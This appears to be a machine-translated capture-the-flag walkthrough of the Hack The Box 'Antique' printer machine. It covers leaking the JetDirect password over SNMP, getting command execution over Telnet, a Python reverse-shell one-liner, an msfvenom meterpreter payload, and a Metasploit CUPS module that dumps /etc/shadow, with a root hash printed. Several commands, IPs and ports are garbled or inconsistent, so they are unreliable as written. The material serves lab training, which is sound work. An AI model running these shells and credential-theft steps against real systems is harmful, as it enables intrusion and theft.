disclaimer

The hosts infiltrated in this article are legally authorized. The tools and methods used in this article are only for learning and communication. Please do not use the tools and infiltration ideas used in this article for any illegal purposes. I am not responsible for any consequences arising therefrom, nor for any misuse or damage caused.

Service to detect

Chrysene ─(root💀kali)-[~/ HTB /Antique] ├ ─# nmap-sv-pn 10.10.11.88 Host discovery disabled (-pn). All addresses will be Marked 'up' and scan times will be slower. Starting Nmap 7.91 (https://nmap.org) at 2021-11-30 07:44 EST Nmap scan Report for 10.10.11.107 Host is up (0.39s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 23/tcp open telnet? 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF - Port23 - TCP: V = I = D = 11 7% / 30% 7.91% Time = P = x86_64 a61cdf % 61 - PC - Linux - gnu % r (NUL SF:L,F,"\nHP\x20JetDirect\n\n")%r(GenericLines,19,"\nHP\x20JetDirect\n\nPa SF: ssword: \ x20 ") % r (tn3270, 19, "\ nHP \ x20JetDirect \ n \ nPassword: \ x20") % r (GetRe SF:quest,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(HTTPOptions,19,"\nHP\x SF:20JetDirect\n\nPassword:\x20")%r(RTSPRequest,19,"\nHP\x20JetDirect\n\nP SF:assword:\x20")%r(RPCCheck,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DN SF:SVersionBindReqTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DNSStatus SF:RequestTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(Help,19,"\nHP\x20 SF:JetDirect\n\nPassword:\x20")%r(SSLSessionReq,19,"\nHP\x20JetDirect\n\nP SF:assword:\x20")%r(TerminalServerCookie,19,"\nHP\x20JetDirect\n\nPassword SF::\x20")%r(TLSSessionReq,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(Kerb SF:eros,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(SMBProgNeg,19,"\nHP\x20 SF:JetDirect\n\nPassword:\x20")%r(X11Probe,19,"\nHP\x20JetDirect\n\nPasswo SF:rd:\x20")%r(FourOhFourRequest,19,"\nHP\x20JetDirect\n\nPassword:\x20")% SF:r(LPDString,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPSearchReq,19 SF:,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPBindReq,19,"\nHP\x20JetDir SF:ect\n\nPassword:\x20")%r(SIPOptions,19,"\nHP\x20JetDirect\n\nPassword:\ SF:x20")%r(LANDesk-RC,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(TerminalS SF:erver,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(NCP,19,"\nHP\x20JetDir SF:ect\n\nPassword:\x20")%r(NotesRPC,19,"\nHP\x20JetDirect\n\nPassword:\x2 SF:0")%r(JavaRMI,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(WMSRequest,19, SF:"\nHP\x20JetDirect\n\nPassword:\x20")%r(oracle-tns,19,"\nHP\x20JetDirec SF:t\n\nPassword:\x20")%r(ms-sql-s,19,"\nHP\x20JetDirect\n\nPassword:\x20" SF:)%r(afp,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(giop,19,"\nHP\x20Jet SF:Direct\n\nPassword:\x20"); Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 Host up) Scanned in 229.74 secondsCopy the code

Port 23 opened a Telnet service, nc connected to see

Chrysene ─(root💀kali)-[~/ HTB /Antique] ├ ─# nc 10.10.11.88 8 HP JetDirect ls Password: 123456 Invalid PasswordCopy the code

The greeting was HP JetDirect, which I checked was an HP printer

You need a password to log in to Telnet, but you don’t need an account

Find this article on Google according to HP JetDirect Telnet as the keyword

Using the method of Getting a JetDirect Password Remotely using the SNMP vulnerability, we enter the following information

─ ─ (root 💀 kali) - ~ / HTB/Antique └ ─ # snmpget - 1 - c v public 10.10.11.107. 1.3.6.1.4.1.11.2.3.9.1.1.13.0 Created directory: / var/lib/SNMP/cert_indexes iso 3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 39 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135Copy the code

Take the number above to the Hex2text website and the password is P@ssw0rd@123!! 123

Use the above credentials to log in to the Telnet account

Chrysene ─(root💀kali)-[~/ HTB /Antique] ├ ─# nc 10.10.11.88 88 HP JetDirect Password: P@ssw0rd@123!! 123 Please type "?" for HELP > ? To Change/Configure Parameters Enter: Parameter-name: value <Carriage Return> Parameter-name Type of value ip: IP-address in dotted notation subnet-mask: address in dotted notation (enter 0 for default) default-gw: address in dotted notation (enter 0 for default) syslog-svr: address in dotted notation (enter 0 for default) idle-timeout: seconds in integers set-cmnty-name: alpha-numeric string (32 chars max) host-name: alpha-numeric string (upper case only, 32 chars max) dhcp-config: 0 to disable, 1 to enable allow: <ip> [mask] (0 to clear, list to display, 10 max) addrawport: <TCP port num> (<TCP port num> 3000-9000) deleterawport: <TCP port num> listrawport: (No parameter required) exec: execute system commands (exec id) exit: quit from telnet session > exec id uid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin) > exec whoami lp /var/spool/lpd > exec find / -name user.txt /home/lp/user.txt /var/spool/lpd/user.txtCopy the code

Right to mention

View system information

Exec uname -a Linux antique 5.13.0-051300-generic #202106272333 SMP Sun Jun 27 23:36:43 UTC 2021 x86_64 x86_64 x86_64 x86_64 GNU/Linux > exec PYTHon3 --version Python 3.8.10Copy the code

If python3 is installed, use the following command to bounce a handy shell

exec python3 -c ‘import socket,os,pty; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); S.c onnect ((” 10.10.14.15 “, 4242)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); pty.spawn(“/bin/sh”)’

Chrysene ─(root💀kali)-[~/ HTB /Antique] ├ ─# nc-lnVP 762 1 ⨯ listening on [any] 762... Connect to [10.10.14.15] from (UNKNOWN) [10.10.11.107] 41100 $ID ID UID =7(lp) GID =7(LP) groups=7(LP),19(lpadmin) $Copy the code

We found that the user group lpadmin is suspicious and may be used to raise rights. After googling, I found this article

It says:

members of lpadmin can read every file on server via cups

The user group, who can access any file in the system, searched for escalation scripts. Finally, an MSF module multi/ ESCALATE /cups_root_file_read could be used for escalation

Let’s compile an MSF rebound shell

Msfvenom -p Linux/x86 / meterpreter/reverse_tcp LHOST = 10.10.14.15 LPORT = 4444 – f the elf > shell. The elf

Transmit to target, trigger, take MSF, execute the lift script

Msf6 exploit(multi/handler) > Run [*] Started reverse TCP handler on 10.10.14.15:4444 [*] Sending stage (980808 bytes) To 10.10.11.107 [*] Meterpreter Session 2 Opened (10.10.14.15:4444 -> 10.10.11.107:52856) at 2021-11-30 11:46:50-0500 meterpreter > run multi/escalate/cups_root_file_read [!]  SESSION may not be compatible with this module. [+] User in lpadmin group, continuing... [+] cupsctl binary found in $PATH [+] nc binary found in $PATH [*] found CUPS 1.6.1 [+] File /etc/shadow (998 bytes) Saved to/root /. Msf4 / loot / 20211130114734 _default_10 10.11.107 _cups_file_read_957992. Bin [*] Cleaning up... meterpreter > getuidCopy the code

Check the /etc/shadow file

┌ ─ ─ (root 💀 kali) - ~ / HTB/Antique └ ─ # cat/root /. Msf4 / loot / 20211130114734 _default_10 10.11.107 _cups_file_read_957992. Bin root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:18760:0: 99999:7::: daemon:*:18375:0:99999:7::: bin:*:18375:0:99999:7::: sys:*:18375:0:99999:7::: sync:*:18375:0:99999:7::: games:*:18375:0:99999:7::: man:*:18375:0:99999:7::: lp:*:18375:0:99999:7::: mail:*:18375:0:99999:7::: news:*:18375:0:99999:7::: uucp:*:18375:0:99999:7::: proxy:*:18375:0:99999:7::: www-data:*:18375:0:99999:7::: backup:*:18375:0:99999:7::: list:*:18375:0:99999:7::: irc:*:18375:0:99999:7::: gnats:*:18375:0:99999:7::: nobody:*:18375:0:99999:7::: systemd-network:*:18375:0:99999:7::: systemd-resolve:*:18375:0:99999:7::: systemd-timesync:*:18375:0:99999:7::: messagebus:*:18375:0:99999:7::: syslog:*:18375:0:99999:7::: _apt:*:18375:0:99999:7::: tss:*:18375:0:99999:7::: uuidd:*:18375:0:99999:7::: tcpdump:*:18375:0:99999:7::: landscape:*:18375:0:99999:7::: pollinate:*:18375:0:99999:7::: systemd-coredump:!! :18389:::::: lxd:! :18389:::::: usbmux:*:18891:0:99999:7:::Copy the code

Edit it into a format that John can read

┌ ─ ─ (root 💀 kali) - ~ / HTB/Antique └ ─ # cat shadow. TXT root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:18760:0: 99999:7: : : ┌ ─ ─ (root 💀 kali) - ~ / HTB/Antique └ ─ # unshadow passwd. TXT shadow. TXT > unshadowed. TXT ┌ ─ ─ (root 💀 kali) - ~ / HTB/Antique └ ─ # cat unshadowed.txt root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:0:0:root :/root:/bin/bashCopy the code

But I can’t blast the code

Root: id_rsa file to edit MSF module

msf6 > use multi/escalate/cups_root_file_read
msf6 post(multi/escalate/cups_root_file_read) > edit

Copy the code

Change line 46 to /root/.ssh/id_rsa

Editors save

Download to local

meterpreter > run multi/escalate/cups_root_file_read [!]  SESSION may not be compatible with this module. [+] User in lpadmin group, continuing... Cupsctl binary found in $PATH [+] NC binary found in $PATH [*] found CUPS 1.6.1 [+] File /root/.ssh/id_rsa (341 Bytes) is saved to/root /. Msf4 / loot / 20211130120322 _default_10 10.11.107 _cups_file_read_145418. Bin [*] Cleaning up...Copy the code

However, without this file:

┌ ─ ─ (root 💀 kali) - [~] └ ─ # cat/root /. Msf4 / loot / 20211130120601 _default_10 10.11.107 _cups_file_read_604992. Bin <! PUBLIC DOCTYPE HTML "- / / / / W3C DTD HTML 4.01 Transitional / / EN" "http://www.w3.org/TR/html4/loose.dtd" > < HTML > < HEAD > < META  HTTP-EQUIV="Content-Type" CONTENT="text/html; Charset = UTF-8 "> <TITLE>Not Found - CUPS v1.6.1</TITLE> <LINK REL="STYLESHEET" TYPE="text/ CSS "HREF="/cups.css"> </HEAD> <BODY> <H1>Not Found</H1> <P></P> </BODY> </HTML>Copy the code

Finally, we had to download /root/root.txt to the local, and finished it at 1:00 in the morning, which was the end of the penetration

meterpreter > run multi/escalate/cups_root_file_read [!]  SESSION may not be compatible with this module. [+] User in lpadmin group, continuing... [+] cupsctl binary found in $PATH [+] nc binary found in $PATH [*] found CUPS 1.6.1 [+] File /root/root.txt (32 bytes) Saved to/root /. Msf4 / loot / 20211130120724 _default_10 10.11.107 _cups_file_read_556098. TXT [*] Cleaning up...Copy the code